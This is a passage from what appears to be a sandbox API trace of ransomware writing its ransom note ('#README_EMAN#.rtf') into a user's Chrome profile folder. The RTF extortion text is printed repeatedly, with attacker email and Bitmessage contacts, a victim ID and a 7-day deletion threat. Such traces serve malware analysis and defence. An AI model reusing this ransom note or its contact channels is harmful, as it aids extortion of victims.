r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.794] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.794] CloseHandle (hObject=0x284) returned 1 [0269.794] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\#readme_eman#.rtf")) returned 0xffffffff [0269.794] GetLastError () returned 0x2 [0269.794] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please 